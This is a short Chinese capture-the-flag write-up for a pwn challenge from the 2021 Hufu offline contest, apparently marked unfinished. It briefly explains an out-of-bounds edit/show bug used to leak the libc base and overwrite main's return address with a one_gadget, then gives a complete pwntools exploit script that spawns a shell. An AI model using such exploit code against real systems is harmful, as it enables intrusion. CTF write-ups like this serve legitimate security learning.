虎符2021线下赛pwn writeup

jdt

　　一个图书管理系统，但并不是常规的堆题。edit和show函数可以越界。edit函数和show函数相互配合泄露libc基地址，将main函数的返回地址覆盖成onegadgets拿shell。

from pwn import *

p = process('./pwn')
elf = ELF('./pwn')
libc = ELF('./libc.so.6')

context(os='linux',arch='amd64',log_level='debug')

def duan():
    gdb.attach(p)
    pause()
def add(price,author,name,description):
    p.sendlineafter('Choice: ','1')
    p.sendafter('Price?',str(price))
    p.sendafter('Author?',author)
    p.sendafter('name?',name)
    p.sendafter('Description?',description)
def show(index):
    p.sendlineafter('Choice: ','3')
    p.sendlineafter('idx?',str(index))

show(16)
p.recvuntil('Author: ')
addr = u64(p.recv(6).ljust(8,'\x00'))
print 'addr-->'+hex(addr)

p.sendlineafter('Choice: ','2')
p.sendlineafter('idx?','16')
p.sendlineafter('Choice: ','2')
p.sendafter('Author?','a'*8)
show(16)
p.recvuntil('aaaaaaaa')
libc_base = u64(p.recv(6).ljust(8,'\x00'))-240-libc.symbols['__libc_start_main']
print 'libc_base-->'+hex(libc_base)
og = [0x45226,0x4527a,0xf0364,0xf1207]
shell = libc_base+og[0]

p.sendlineafter('Choice: ','2')
p.sendlineafter('idx?','16')
p.sendlineafter('Choice: ','2')
p.sendafter('Author?',p64(addr)+p64(shell))

p.sendlineafter('Choice: ','5')
p.interactive()

 未完结...